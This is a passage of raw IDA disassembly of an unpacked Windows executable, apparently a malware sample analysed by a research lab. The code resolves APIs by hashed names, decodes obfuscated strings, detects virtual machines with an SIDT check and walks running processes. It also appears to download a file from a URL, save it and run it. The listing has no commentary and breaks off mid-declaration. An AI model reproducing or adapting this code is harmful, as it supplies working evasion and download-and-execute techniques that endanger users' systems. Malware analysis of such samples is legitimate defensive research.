;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BFCC5C952943F4FB24DC508A6EED0671
; File Name : u:\work\bfcc5c952943f4fb24dc508a6eed0671_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40102E+28�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
lea ecx, [esi-1]
test ecx, ecx
push 2
pop eax
jz short loc_401015
loc_40100F: ; CODE XREF: sub_401000+13�j
imul eax, eax
dec ecx
jnz short loc_40100F
loc_401015: ; CODE XREF: sub_401000+D�j
movzx edx, [esp+4+arg_0]
push 8
pop ecx
sub ecx, esi
dec eax
shl eax, cl
and eax, edx
sar eax, cl
mov ecx, esi
shl edx, cl
pop esi
or eax, edx
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40102E proc near ; CODE XREF: sub_401117:loc_401173�p
; sub_401485+20E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_4]
push 100h
xor esi, esi
push esi
push edi
call sub_4010BB
add esp, 0Ch
cmp [esp+8+arg_8], esi
jle short loc_40106B
push ebx
mov ebx, [esp+0Ch+arg_0]
loc_401050: ; CODE XREF: sub_40102E+3A�j
movzx eax, byte ptr [ebx]
push 4
push eax
call sub_401000
not al
inc ebx
mov [esi+edi], al
inc esi
cmp esi, [esp+14h+arg_8]
pop ecx
pop ecx
jl short loc_401050
pop ebx
loc_40106B: ; CODE XREF: sub_40102E+1B�j
mov byte ptr [esi+edi], 0
pop edi
pop esi
retn
sub_40102E endp
; =============== S U B R O U T I N E =======================================
sub_401072 proc near ; CODE XREF: sub_401117:loc_4011D7�p
push esi
mov eax, fs:[eax+30h]
test eax, eax
js short loc_401087
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
jmp short loc_401090
; ---------------------------------------------------------------------------
loc_401087: ; CODE XREF: sub_401072+7�j
mov eax, [eax+34h]
lea eax, [eax+7Ch]
mov eax, [eax+3Ch]
loc_401090: ; CODE XREF: sub_401072+13�j
pop esi
retn
sub_401072 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401094 proc near ; CODE XREF: sub_401BFB+1E7�p
var_7 = byte ptr -7
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_1], 0
sidt fword ptr [ebp+var_7]
mov eax, dword ptr [ebp+var_7+2]
and eax, 0FFF00000h
cmp eax, 0FFC00000h
jnz short loc_4010B5
mov [ebp+var_1], 1
loc_4010B5: ; CODE XREF: sub_401094+1B�j
movzx eax, [ebp+var_1]
leave
retn
sub_401094 endp
; =============== S U B R O U T I N E =======================================
sub_4010BB proc near ; CODE XREF: sub_40102E+F�p
; sub_401485+EA�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
test ecx, ecx
jz short loc_4010E9
mov al, [esp+arg_4]
push ebx
mov bl, al
mov bh, bl
mov edx, ecx
push edi
mov edi, [esp+8+arg_0]
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop ebx
loc_4010E9: ; CODE XREF: sub_4010BB+6�j
mov eax, [esp+arg_0]
retn
sub_4010BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010EE proc near ; CODE XREF: sub_402481+171�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_4]
jz short loc_40110E
mov ecx, [ebp+arg_0]
sub ecx, eax
loc_4010FF: ; CODE XREF: sub_4010EE+1E�j
mov dl, [eax]
dec [ebp+arg_8]
mov [ecx+eax], dl
inc eax
cmp [ebp+arg_8], 0
jnz short loc_4010FF
loc_40110E: ; CODE XREF: sub_4010EE+A�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_4010EE endp
; =============== S U B R O U T I N E =======================================
sub_401113 proc near ; CODE XREF: sub_402481+C�p
mov eax, [esp+0]
retn
sub_401113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401117 proc near ; CODE XREF: sub_401117+68�p
; sub_401301+43�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp dword_404104, 3
jl short loc_40112C
inc dword_404104
loc_40112C: ; CODE XREF: sub_401117+D�j
cmp dword_404104, 0C6h
jle short loc_401142
mov dword_404104, 17h
loc_401142: ; CODE XREF: sub_401117+1F�j
mov eax, [ebp+arg_0]
dec eax
push esi
jz loc_4011D7
dec eax
jz short loc_4011C8
dec eax
jz short loc_4011B9
dec eax
jz short loc_4011AA
dec eax
jz short loc_40119B
dec eax
jz short loc_40118C
dec eax
jz short loc_401166
loc_40115F: ; CODE XREF: sub_401117+1BF�j
xor eax, eax
jmp loc_4012F9
; ---------------------------------------------------------------------------
loc_401166: ; CODE XREF: sub_401117+46�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40305C
loc_401173: ; CODE XREF: sub_401117+82�j
; sub_401117+91�j ...
call sub_40102E
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
jmp short loc_4011DC
; ---------------------------------------------------------------------------
loc_40118C: ; CODE XREF: sub_401117+43�j
push 0Ch
mov esi, offset dword_404108
push esi
push offset dword_40304C
jmp short loc_401173
; ---------------------------------------------------------------------------
loc_40119B: ; CODE XREF: sub_401117+40�j
push 9
mov esi, offset dword_404108
push esi
push offset dword_403040
jmp short loc_401173
; ---------------------------------------------------------------------------
loc_4011AA: ; CODE XREF: sub_401117+3D�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
jmp short loc_401173
; ---------------------------------------------------------------------------
loc_4011B9: ; CODE XREF: sub_401117+3A�j
push 0Ah
mov esi, offset dword_404108
push esi
push offset dword_403028
jmp short loc_401173
; ---------------------------------------------------------------------------
loc_4011C8: ; CODE XREF: sub_401117+37�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40301C
jmp short loc_401173
; ---------------------------------------------------------------------------
loc_4011D7: ; CODE XREF: sub_401117+30�j
call sub_401072
loc_4011DC: ; CODE XREF: sub_401117+73�j
mov ecx, dword_404104
cmp ecx, 0Eh
mov [ebp+arg_0], eax
jl short loc_4011F1
inc ecx
mov dword_404104, ecx
loc_4011F1: ; CODE XREF: sub_401117+D1�j
mov eax, 0C5h
cmp ecx, eax
jle short loc_401203
push 14h
pop ecx
mov dword_404104, ecx
loc_401203: ; CODE XREF: sub_401117+E1�j
mov edx, [ebp+arg_0]
mov esi, [edx+3Ch]
mov esi, [esi+edx+78h]
add esi, edx
cmp ecx, 3
jl short loc_40121B
inc ecx
mov dword_404104, ecx
loc_40121B: ; CODE XREF: sub_401117+FB�j
cmp ecx, eax
jle short loc_401228
push 1Ch
pop ecx
mov dword_404104, ecx
loc_401228: ; CODE XREF: sub_401117+106�j
mov eax, [ebp+arg_4]
shr eax, 10h
test ax, ax
jnz short loc_40123F
movzx eax, word ptr [ebp+arg_4]
sub eax, [esi+10h]
jmp loc_4012DF
; ---------------------------------------------------------------------------
loc_40123F: ; CODE XREF: sub_401117+11A�j
lea eax, [ecx-18h]
cmp eax, 0CCh
ja short loc_401250
inc ecx
mov dword_404104, ecx
loc_401250: ; CODE XREF: sub_401117+130�j
push ebx
mov ebx, [esi+24h]
push edi
mov edi, [esi+20h]
add ebx, edx
lea eax, [ecx-40h]
add edi, edx
cmp eax, 9Dh
mov [ebp+var_C], ebx
ja short loc_401270
inc ecx
mov dword_404104, ecx
loc_401270: ; CODE XREF: sub_401117+150�j
and [ebp+var_4], 0
cmp dword ptr [esi+18h], 0
jbe short loc_4012BC
loc_40127A: ; CODE XREF: sub_401117+1A3�j
mov edx, [edi]
add edx, [ebp+arg_0]
and [ebp+var_8], 0
mov al, [edx]
test al, al
jz short loc_4012A1
loc_401289: ; CODE XREF: sub_401117+185�j
mov ebx, [ebp+var_8]
movsx eax, al
rol ebx, 7
xor ebx, eax
inc edx
mov al, [edx]
test al, al
mov [ebp+var_8], ebx
jnz short loc_401289
mov ebx, [ebp+var_C]
loc_4012A1: ; CODE XREF: sub_401117+170�j
mov eax, [ebp+arg_4]
cmp [ebp+var_8], eax
jz short loc_4012FC
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 4
inc ebx
inc ebx
cmp eax, [esi+18h]
mov [ebp+var_C], ebx
jb short loc_40127A
loc_4012BC: ; CODE XREF: sub_401117+161�j
mov eax, [ebp+arg_0]
loc_4012BF: ; CODE XREF: sub_401117+1E8�j
cmp ecx, 0F3h
pop edi
pop ebx
jge short loc_4012D0
inc ecx
mov dword_404104, ecx
loc_4012D0: ; CODE XREF: sub_401117+1B0�j
mov edx, [ebp+var_4]
cmp edx, [esi+18h]
jz loc_40115F
mov edx, [ebp+arg_0]
loc_4012DF: ; CODE XREF: sub_401117+123�j
mov esi, [esi+1Ch]
lea eax, [esi+eax*4]
mov eax, [eax+edx]
lea esi, [ecx-53h]
cmp esi, 75h
ja short loc_4012F7
inc ecx
mov dword_404104, ecx
loc_4012F7: ; CODE XREF: sub_401117+1D7�j
add eax, edx
loc_4012F9: ; CODE XREF: sub_401117+4A�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4012FC: ; CODE XREF: sub_401117+190�j
movzx eax, word ptr [ebx]
jmp short loc_4012BF
sub_401117 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401301 proc near ; CODE XREF: sub_401BFB+1F4�p
; sub_402951+15�p
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
cmp dword_404104, 0F9h
jge short loc_40131C
inc dword_404104
loc_40131C: ; CODE XREF: sub_401301+13�j
cmp byte_404209, 0
jz short loc_40132C
mov al, byte_404208
leave
retn
; ---------------------------------------------------------------------------
loc_40132C: ; CODE XREF: sub_401301+22�j
push 9C480E24h
push 1
mov byte_404209, 1
mov [ebp+var_94], 94h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_94]
push ecx
call eax
cmp [ebp+var_84], 2
setz al
cmp dword_404104, 93h
mov byte_404208, al
jge short locret_401375
inc dword_404104
locret_401375: ; CODE XREF: sub_401301+6C�j
leave
retn
sub_401301 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401377 proc near ; CODE XREF: sub_401485+26C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_404104, 61h
jge short loc_40138A
inc dword_404104
loc_40138A: ; CODE XREF: sub_401377+B�j
push ebx
push esi
push edi
xor edi, edi
inc edi
cmp [ebp+arg_0], 0
jz loc_40144D
mov esi, 99A4299Dh
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push edi
push edi
call eax
mov ebx, eax
test ebx, ebx
jz short loc_401404
cmp dword_404104, 5
jl short loc_4013C4
inc dword_404104
loc_4013C4: ; CODE XREF: sub_401377+45�j
cmp dword_404104, 0BCh
jle short loc_4013DA
mov dword_404104, 16h
loc_4013DA: ; CODE XREF: sub_401377+57�j
push 0FDC94385h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push ebx
call eax
mov esi, [ebp+var_4]
push 9E6FA842h
push edi
call sub_401117
pop ecx
pop ecx
push esi
push ebx
call eax
jmp short loc_401450
; ---------------------------------------------------------------------------
loc_401404: ; CODE XREF: sub_401377+3C�j
cmp dword_404104, 0F9h
jge short loc_401416
inc dword_404104
loc_401416: ; CODE XREF: sub_401377+97�j
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push 0
push edi
call eax
push 9E6FA842h
push edi
mov ebx, eax
call sub_401117
pop ecx
pop ecx
push 0FFFFFFFFh
push ebx
call eax
push 723EB0D5h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
jmp short loc_401450
; ---------------------------------------------------------------------------
loc_40144D: ; CODE XREF: sub_401377+1D�j
mov ebx, [ebp+arg_0]
loc_401450: ; CODE XREF: sub_401377+8B�j
; sub_401377+D4�j
push 5Fh
pop eax
push 2Ah
pop ecx
loc_401456: ; CODE XREF: sub_401377+F2�j
cmp ecx, 0C2h
ja short loc_401460
inc eax
inc ecx
loc_401460: ; CODE XREF: sub_401377+E5�j
add eax, 30h
add ecx, 30h
cmp eax, 6Fh
jl short loc_401456
push 723EB0D5h
push edi
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_401377 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401485 proc near ; CODE XREF: sub_401BFB+1FE�p
; sub_402951+E5�p ...
var_1318 = dword ptr -1318h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_116 = byte ptr -116h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1318h
call sub_402CB0
cmp dword_404104, 82h
jge short loc_4014A4
inc dword_404104
loc_4014A4: ; CODE XREF: sub_401485+17�j
push ebx
push esi
push edi
push 774393E8h
push 1
call sub_401117
pop ecx
pop ecx
mov ebx, 100h
push ebx
lea ecx, [ebp+var_318]
push ecx
push 0
call eax
push 8AC4909Bh
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_C]
push ecx
push 1000h
lea ecx, [ebp+var_1318]
push ecx
call eax
test eax, eax
jz loc_40176C
cmp dword_404104, 51h
jge short loc_4014FD
inc dword_404104
loc_4014FD: ; CODE XREF: sub_401485+70�j
and [ebp+var_4], 0
test [ebp+var_C], 0FFFFFFFCh
jbe loc_40176C
mov edi, offset dword_404108
loc_401513: ; CODE XREF: sub_401485+2E1�j
mov eax, [ebp+var_4]
mov esi, [ebp+eax*4+var_1318]
test esi, esi
jz loc_40175A
cmp dword_404104, 12h
jl short loc_401534
inc dword_404104
loc_401534: ; CODE XREF: sub_401485+A7�j
cmp dword_404104, 0E3h
jle short loc_40154A
mov dword_404104, 14h
loc_40154A: ; CODE XREF: sub_401485+B9�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
xor esi, esi
push esi
push 410h
call eax
push ebx
mov [ebp+var_8], eax
lea eax, [ebp+var_118]
push esi
push eax
call sub_4010BB
add esp, 0Ch
cmp [ebp+var_8], esi
jz loc_401747
push 189F16C9h
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_14]
push ecx
push 4
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_8]
call eax
test eax, eax
jz loc_401747
cmp dword_404104, 0F5h
jge short loc_4015B7
inc dword_404104
loc_4015B7: ; CODE XREF: sub_401485+12A�j
mov esi, [ebp+var_10]
push 0E4FB2191h
push 5
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_118]
push ecx
push esi
push [ebp+var_8]
call eax
mov esi, dword_403008
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
test eax, eax
jz loc_401747
cmp [ebp+var_117], 3Ah
jnz loc_401747
cmp [ebp+var_116], 5Ch
jnz loc_401747
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
mov esi, eax
jmp short loc_401615
; ---------------------------------------------------------------------------
loc_401614: ; CODE XREF: sub_401485+198�j
dec esi
loc_401615: ; CODE XREF: sub_401485+18D�j
cmp [ebp+esi+var_118], 5Ch
jnz short loc_401614
push [ebp+arg_0]
call dword_403008 ; lstrlen
test eax, eax
jle short loc_401676
push 58h
pop eax
push 44h
pop ecx
loc_401632: ; CODE XREF: sub_401485+1C2�j
cmp ecx, 0DFh
ja short loc_40163C
inc eax
inc ecx
loc_40163C: ; CODE XREF: sub_401485+1B3�j
add eax, 27h
add ecx, 27h
cmp eax, 0A9h
jl short loc_401632
push [ebp+arg_0]
mov dword_404104, eax
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jnz loc_401747
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_1318]
jmp loc_401781
; ---------------------------------------------------------------------------
loc_401676: ; CODE XREF: sub_401485+1A5�j
mov eax, dword_404104
add eax, 0FFFFFFF6h
cmp eax, 0D8h
ja short loc_40168B
inc dword_404104
loc_40168B: ; CODE XREF: sub_401485+1FE�j
push 0Bh
push edi
push offset dword_40306C
call sub_40102E
push 8A94F707h
push 7
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
test eax, eax
jnz loc_401747
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_118]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_401747
push edi
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_401747
mov eax, [ebp+var_4]
push [ebp+eax*4+var_1318]
call sub_401377
pop ecx
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_218]
push eax
call dword_403000 ; lstrcpy
push 1
push edi
push offset dword_403068
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_218]
push eax
call dword_40300C ; lstrcat
push 20E4E9EDh
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_218]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
loc_401747: ; CODE XREF: sub_401485+F5�j
; sub_401485+11A�j ...
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_40175A: ; CODE XREF: sub_401485+9A�j
mov eax, [ebp+var_C]
inc [ebp+var_4]
shr eax, 2
cmp [ebp+var_4], eax
jb loc_401513
loc_40176C: ; CODE XREF: sub_401485+63�j
; sub_401485+83�j
mov eax, dword_404104
add eax, 0FFFFFFB4h
cmp eax, 0A9h
ja short loc_401781
inc dword_404104
loc_401781: ; CODE XREF: sub_401485+1EC�j
; sub_401485+2F4�j
pop edi
pop esi
pop ebx
leave
retn
sub_401485 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401786 proc near ; CODE XREF: sub_401BFB+298�p
; sub_401BFB+30C�p ...
var_87C = byte ptr -87Ch
var_47C = byte ptr -47Ch
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 87Ch
mov eax, dword_404104
push ebx
xor ebx, ebx
add eax, 0FFFFFFEDh
cmp eax, 0E1h
mov [ebp+var_4], ebx
mov [ebp+var_14], ebx
mov [ebp+var_20], 7D0h
ja short loc_4017B4
inc dword_404104
loc_4017B4: ; CODE XREF: sub_401786+26�j
push esi
push edi
mov esi, 400h
push esi
lea eax, [ebp+var_87C]
push ebx
push eax
call sub_4010BB
push 534D481h
push 3
mov [ebp+var_18], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_87C]
push ecx
push ebx
call eax
push 5
mov edi, offset dword_404108
push edi
push offset dword_403078
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_87C]
push eax
call dword_40300C ; lstrcat
push 33h
pop eax
push 0FFFFFFD2h
mov [ebp+var_1C], ebx
pop ecx
loc_401815: ; CODE XREF: sub_401786+A1�j
cmp ecx, 6Ch
ja short loc_40181C
inc eax
inc ecx
loc_40181C: ; CODE XREF: sub_401786+92�j
add eax, 18h
add ecx, 18h
cmp eax, 9Dh
jl short loc_401815
push 4
mov dword_404104, eax
pop edi
loc_401831: ; CODE XREF: sub_401786+3E9�j
push 8593DD7h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_87C]
push ecx
call eax
push 0B87DBD66h
push edi
mov [ebp+var_C], eax
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_0]
push [ebp+var_C]
call eax
mov [ebp+var_8], eax
mov eax, dword_404104
add eax, 0FFFFFFA8h
cmp eax, 95h
ja short loc_40187F
inc dword_404104
loc_40187F: ; CODE XREF: sub_401786+F1�j
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 2
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 6
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 5
push [ebp+var_C]
call eax
mov eax, dword_404104
add eax, 0FFFFFF9Eh
cmp eax, 75h
ja short loc_4018DD
inc dword_404104
loc_4018DD: ; CODE XREF: sub_401786+14F�j
push 2F5CE027h
push edi
mov [ebp+var_14], ebx
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_14]
push ecx
push 20000005h
push [ebp+var_8]
call eax
mov eax, [ebp+var_14]
lea ecx, [eax-401h]
cmp ecx, 48FDEh
ja loc_401A53
push 5
pop eax
push 0FFFFFFE5h
pop ecx
loc_40191E: ; CODE XREF: sub_401786+1AD�j
cmp ecx, 0B6h
ja short loc_401928
inc eax
inc ecx
loc_401928: ; CODE XREF: sub_401786+19E�j
add eax, 0Bh
add ecx, 0Bh
cmp eax, 0BBh
jl short loc_40191E
push 8F8F114h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push edi
push ebx
push 2
push 40000000h
push [ebp+arg_4]
call eax
push esi
mov [ebp+var_10], eax
lea eax, [ebp+var_47C]
push ebx
push eax
mov [ebp+var_4], ebx
call sub_4010BB
push 1A212962h
push edi
mov [ebp+var_18], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
mov ecx, dword_404104
test eax, eax
setnz al
add ecx, 0FFFFFFF7h
cmp ecx, 0E2h
ja short loc_401A14
inc dword_404104
jmp short loc_401A14
; ---------------------------------------------------------------------------
loc_4019B0: ; CODE XREF: sub_401786+291�j
cmp al, bl
jz short loc_401A19
mov eax, [ebp+var_4]
push 0F3FD1C3h
push 1
mov [ebp+var_24], eax
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_28]
push ecx
push [ebp+var_24]
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_10]
call eax
push esi
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_4010BB
push 1A212962h
push edi
mov [ebp+var_18], esi
mov [ebp+var_4], ebx
call sub_401117
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
loc_401A14: ; CODE XREF: sub_401786+220�j
; sub_401786+228�j
cmp [ebp+var_4], ebx
ja short loc_4019B0
loc_401A19: ; CODE XREF: sub_401786+22C�j
cmp dword_404104, 6
jl short loc_401A28
inc dword_404104
loc_401A28: ; CODE XREF: sub_401786+29A�j
cmp dword_404104, 0DBh
jle short loc_401A3E
mov dword_404104, 1Bh
loc_401A3E: ; CODE XREF: sub_401786+2AC�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
jmp short loc_401A66
; ---------------------------------------------------------------------------
loc_401A53: ; CODE XREF: sub_401786+18C�j
add eax, 0FFFFFFFEh
cmp eax, 3FEh
ja short loc_401A66
mov [ebp+arg_8], bl
jmp short loc_401A66
; ---------------------------------------------------------------------------
loc_401A62: ; CODE XREF: sub_401786+306�j
cmp al, bl
jz short loc_401A8E
loc_401A66: ; CODE XREF: sub_401786+2CB�j
; sub_401786+2D5�j ...
push 1A212962h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
cmp [ebp+var_4], ebx
ja short loc_401A62
loc_401A8E: ; CODE XREF: sub_401786+2DE�j
cmp dword_404104, 81h
jge short loc_401AA0
inc dword_404104
loc_401AA0: ; CODE XREF: sub_401786+312�j
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
push 4Dh
pop eax
push 3Ah
pop ecx
loc_401ACA: ; CODE XREF: sub_401786+359�j
cmp ecx, 0D9h
ja short loc_401AD4
inc eax
inc ecx
loc_401AD4: ; CODE XREF: sub_401786+34A�j
add eax, 25h
add ecx, 25h
cmp eax, 0BEh
jl short loc_401ACA
push 8F8F114h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call eax
push 0AEF7CBF1h
push 1
mov [ebp+var_10], eax
call sub_401117
pop ecx
pop ecx
push ebx
push [ebp+var_10]
call eax
push 723EB0D5h
push 1
mov [ebp+var_24], eax
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
inc [ebp+var_1C]
cmp dword_404104, 0Eh
jl short loc_401B48
inc dword_404104
loc_401B48: ; CODE XREF: sub_401786+3BA�j
cmp dword_404104, 0DCh
jle short loc_401B5E
mov dword_404104, 1Ah
loc_401B5E: ; CODE XREF: sub_401786+3CC�j
mov edx, [ebp+var_14]
cmp edx, [ebp+var_24]
jz short loc_401B75
cmp [ebp+var_1C], 5
jge short loc_401B75
cmp [ebp+arg_8], bl
jnz loc_401831
loc_401B75: ; CODE XREF: sub_401786+3DE�j
; sub_401786+3E4�j
push 22h
pop eax
push 0Ch
pop ecx
pop edi
pop esi
loc_401B7D: ; CODE XREF: sub_401786+40C�j
cmp ecx, 0D6h
ja short loc_401B87
inc eax
inc ecx
loc_401B87: ; CODE XREF: sub_401786+3FD�j
add eax, 1Dh
add ecx, 1Dh
cmp eax, 0B4h
jl short loc_401B7D
mov dword_404104, eax
lea eax, [edx-2]
cmp eax, 3FEh
ja short loc_401BA7
xor eax, eax
jmp short loc_401BF8
; ---------------------------------------------------------------------------
loc_401BA7: ; CODE XREF: sub_401786+41B�j
cmp [ebp+arg_8], bl
jz short loc_401BF5
add edx, 0FFFFFBFFh
cmp edx, 48FDEh
ja short loc_401BF5
push 40h
lea eax, [ebp+var_78]
push ebx
push eax
mov [ebp+var_7C], 44h
call sub_4010BB
push 46318AC7h
push 1
call sub_401117
add esp, 14h
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_7C]
push ecx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_4]
push ebx
call eax
xor eax, eax
inc eax
jmp short loc_401BF8
; ---------------------------------------------------------------------------
loc_401BF5: ; CODE XREF: sub_401786+424�j
; sub_401786+432�j
or eax, 0FFFFFFFFh
loc_401BF8: ; CODE XREF: sub_401786+41F�j
; sub_401786+46D�j
pop ebx
leave
retn
sub_401786 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401BFB proc near ; CODE XREF: sub_402951:loc_402C77�p
; DATA XREF: sub_4027D7+128�o
var_3B8 = byte ptr -3B8h
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1A8 = byte ptr -1A8h
var_198 = byte ptr -198h
var_188 = byte ptr -188h
var_178 = byte ptr -178h
var_168 = byte ptr -168h
var_158 = byte ptr -158h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_38 = byte ptr -38h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
